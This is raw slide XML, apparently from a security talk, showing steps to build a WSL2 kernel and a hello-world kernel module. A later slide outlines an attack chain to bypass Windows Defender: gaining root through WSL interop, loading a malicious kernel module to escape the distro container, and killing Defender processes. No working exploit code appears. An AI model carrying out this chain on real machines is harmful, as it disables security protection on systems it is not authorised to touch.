      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="256" name="Google Shape;256;p35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1838613"/>
            <a:ext cx="4175100" cy="8313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apt install build-essential flex bison dwarves libssl-dev libelf-dev cpio qemu-utils</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="JetBrains Mono"/>
              <a:ea typeface="JetBrains Mono"/>
              <a:cs typeface="JetBrains Mono"/>
              <a:sym typeface="JetBrains Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="257" name="Google Shape;257;p35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="2890500"/>
            <a:ext cx="4175100" cy="14775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zcat</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/proc/config.gz</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&gt;</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.config</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="CE9178"/>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make</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>-j</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t> ${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>nproc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>}</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make</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>-j</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t> ${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>nproc</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modules_install</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="CE9178"/>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a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>cp</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/sys/kernel/btf/vmlinux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t> ${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>KERNELSRCDIR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="JetBrains Mono"/>
              <a:ea typeface="JetBrains Mono"/>
              <a:cs typeface="JetBrains Mono"/>
              <a:sym typeface="JetBrains Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="258" name="Google Shape;258;p35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1120375"/>
            <a:ext cx="417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pl" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>https://github.com/microsoft/WSL2-Linux-Kernel</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="1600">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="JetBrains Mono"/>
              <a:ea typeface="JetBrains Mono"/>
              <a:cs typeface="JetBrains Mono"/>
              <a:sym typeface="JetBrains Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="259" name="Google Shape;259;p35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4657200" y="1181700"/>
            <a:ext cx="4175100" cy="31863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l" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="C586C0"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>#include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>&lt;linux/init.h&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:srgbClr val="CE9178"/>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586C0"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>#include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>&lt;linux/module.h&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:srgbClr val="CE9178"/>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586C0"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>#include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>&lt;linux/kernel.h&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:srgbClr val="CE9178"/>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569CD6"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>static</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t> __init </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>entrypoint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>) {</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CCCCC"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>printk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>(KERN_INFO </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>"Hello World!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="D7BA7D"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>\n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a: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CCCCC"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="C586C0"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="B5CEA8"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a: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CCCCC"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a: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569CD6"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>static</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t> __exit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>exitpoint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>) {</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CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a: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DCDCAA"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>module_init</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>(entrypoint);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300">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>module_exit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>(exitpoint);</a:t>
            </a:r>
            <a:endParaRPr sz="13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300">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>MODULE_LICENSE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>"GPL"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="JetBrains Mono"/>
              <a:ea typeface="JetBrains Mono"/>
              <a:cs typeface="JetBrains Mono"/>
              <a:sym typeface="JetBrains Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="260" name="Google Shape;260;p35" title="Screenshot 2025-06-02 at 23.49.11.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="1835" t="8767"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4657200" y="4485775"/>
            <a:ext cx="3111450" cy="300750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="28575">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="dash"/>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Bypass </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl"/>
              <a:t>Windows Defender plugin</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="266" name="Google Shape;266;p36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1289100"/>
            <a:ext cx="2847900" cy="8313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1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>Elevate to root using interop and wsl.exe binary</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="JetBrains Mono"/>
              <a:ea typeface="JetBrains Mono"/>
              <a:cs typeface="JetBrains Mono"/>
              <a:sym typeface="JetBrains Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="267" name="Google Shape;267;p36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="2696213"/>
            <a:ext cx="2847900" cy="8313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2. Load </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t> kernel module to jump out of the distro container</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="JetBrains Mono"/>
              <a:ea typeface="JetBrains Mono"/>
              <a:cs typeface="JetBrains Mono"/>
              <a:sym typeface="JetBrains Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="268" name="Google Shape;268;p36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="4103325"/>
            <a:ext cx="2847900" cy="615600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="28575">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3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>. Kill the MS Defender processes on the VM </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="JetBrains Mono"/>
              <a:ea typeface="JetBrains Mono"/>
              <a:cs typeface="JetBrains Mono"/>
              <a:sym typeface="JetBrains Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="269" name="Google Shape;269;p36"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1680700" y="2120400"/>
            <a:ext cx="0" cy="575700"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
